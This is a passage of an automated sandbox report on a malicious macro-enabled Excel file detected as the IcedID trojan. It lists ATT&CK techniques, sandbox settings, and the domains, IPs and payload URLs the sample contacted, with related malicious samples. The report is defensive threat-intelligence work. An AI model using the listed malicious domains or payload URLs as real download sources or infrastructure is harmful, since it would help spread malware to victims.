Source: Yara match	File source: 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 3024, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 3024, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery211	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol124	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery22	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1S9KTMR8MSDY7X19T47NJX-Content-Ty	0%	Avira URL Cloud	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	0%	URL Reputation	safe
http://crt.sca1b.aP	0%	Avira URL Cloud	safe
https://www.buzzsprout.com;	0%	Avira URL Cloud	safe
http://astrocycle.download/	0%	Avira URL Cloud	safe
http://crl.sca1b.amazontrust.com/sca1b.crl0g0-	0%	Avira URL Cloud	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com06	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://crl.rootg2.amazontrust.com/rootg2.crl0	0%	URL Reputation	safe
http://uppercilio.fun/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	0%	Avira URL Cloud	safe
http://thousandsyears.download/div/44376,8555986111.jpg	0%	Avira URL Cloud	safe
https://amazonwebservices.d2.sc.omtrdc.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://112-tzm-766.mktoutil.com	0%	Avira URL Cloud	safe
https://download.stormacq.com/aws/podcast/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
astrocycle.download	0%	Avira URL Cloud	safe
https://chtbl.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
uppercilio.fun	172.67.146.88	true	false	unknown
thousandsyears.download	172.67.198.51	true	false	unknown
voopeople.fun	172.67.194.117	true	false	unknown
astrocycle.download	172.67.213.115	true	true	unknown
dr49lng3n1n2s.cloudfront.net	13.225.75.73	true	false	high
aws.amazon.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://astrocycle.download/	true	Avira URL Cloud: safe	unknown
http://uppercilio.fun/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
http://thousandsyears.download/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
astrocycle.download	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.linkedin.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/directories	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://c0.b0.p.awsstatic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://amazon.com/S	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false		high
https://api.regional-table.region-services.aws.a2z.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1S9KTMR8MSDY7X19T47NJX-Content-Ty	regsvr32.exe, 00000004.00000002.2089982082.0000000002BA3000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/ar/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sca1b.aP	regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://a0.p.awsstatic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/cn/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://www.buzzsprout.com;	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://p.adsymptotic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
http://www.windows.com/pctv.	regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	false		high
http://crl.sca1b.amazontrust.com/sca1b.crl0g0-	regsvr32.exe, 00000004.00000002.2088629916.00000000003BD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/marketplace/?nc2=h_mo	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://d2a6igt6jhaluh.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
http://ocsp.sca1b.amazontrust.com06	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://dftu77xade0tc.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/search/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc2=h_lg	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/tw/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tr/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/?nc1=h_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://d1fgizr415o1r6.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-search/1.0.13/js	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089982082.0000000002BA3000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://f0.awsstatic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false		high
https://spot-bid-advisor.s3.amazonaws.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/	regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	false		high
https://d3ctxlq1ktw2nl.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://amazonwebservices.d2.sc.omtrdc.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/podcasts/aws-podcast/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://d1yyh5dhdgifnx.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/jp/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://d1hemuljm71t2j.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://view-stage.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/public-pricing-agc/	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/de/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	false		high
https://phd.aws.amazon.com/?nc2=h_m_sc	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/libra-cardsui	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2090028990.0000000002E00000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://ssl-static.libsyn.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://website.spot.ec2.aws.a2z.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false		high
https://112-tzm-766.mktoutil.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.doubleclick.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/?nc1=f_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
http://investor.msn.com	regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	false		high
https://aws.amazon.com/tr/	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/g11n-lib/2.0.76	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://www.amazon.jobs/aws	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://googleads.g.doubleclick.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/aws-messaging-pricing-information/	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://download.stormacq.com/aws/podcast/	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/support/home?nc2=h_ql_cu	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://d2908q01vomqb2.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dgen8gghn3u86.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/?nc1=f_ls	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/aws-blog/1.0.47/js	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://chtbl.com	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dk261l6wntthl.cloudfront.net	regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/billing/home?nc2=h_m_bc	regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.198.51	thousandsyears.download	United States	13335	CLOUDFLARENETUS	false
13.225.75.73	dr49lng3n1n2s.cloudfront.net	United States	16509	AMAZON-02US	false
172.67.213.115	astrocycle.download	United States	13335	CLOUDFLARENETUS	true
172.67.146.88	uppercilio.fun	United States	13335	CLOUDFLARENETUS	false
172.67.194.117	voopeople.fun	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444724
Start date:	06.07.2021
Start time:	15:56:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	List-4527768.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 65.4% (good quality ratio 51.5%) Quality average: 59.5% Quality standard deviation: 39.6%
HCA Information:	Successful, ratio: 78% Number of executed functions: 13 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.198.51	HRcontacts7752205.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	PI-210610.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
13.225.75.73	http://cloudfront.com	Get hash	malicious	Browse	aws.amazon.com/cloudfront

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
astrocycle.download	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.213.115
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.37.209
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.213.115
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.37.209
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.213.115
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.213.115
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.213.115
dr49lng3n1n2s.cloudfront.net	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74
	8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll	Get hash	malicious	Browse	143.204.91.74
	718421.xlsm	Get hash	malicious	Browse	143.204.91.74
	Ln11IgJVUM.dll	Get hash	malicious	Browse	13.225.75.73
	6c710694d270db91b550daf3177622514d2444e7484fb.dll	Get hash	malicious	Browse	13.225.75.73
	SOAOG31JdG.dll	Get hash	malicious	Browse	13.225.75.73
	QEiuTX6cTw.dll	Get hash	malicious	Browse	143.204.91.74
	YiIS9HvO21.dll	Get hash	malicious	Browse	13.32.16.68
	xDxD5fLpPC.dll	Get hash	malicious	Browse	52.222.157.68
	YiIS9HvO21.dll	Get hash	malicious	Browse	52.222.157.68
	AQvfg6cfsH.dll	Get hash	malicious	Browse	52.222.157.68
	1hIvIzTHG5.dll	Get hash	malicious	Browse	52.222.157.68
	0WX1X0cxwl.dll	Get hash	malicious	Browse	52.222.157.68
voopeople.fun	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
thousandsyears.download	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.198.51
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.52.111
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.198.51
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.198.51
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.198.51
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.198.51
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.198.51
uppercilio.fun	HRcontacts7752205.xlsm	Get hash	malicious	Browse	104.21.55.83
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.146.88
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.55.83
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.55.83
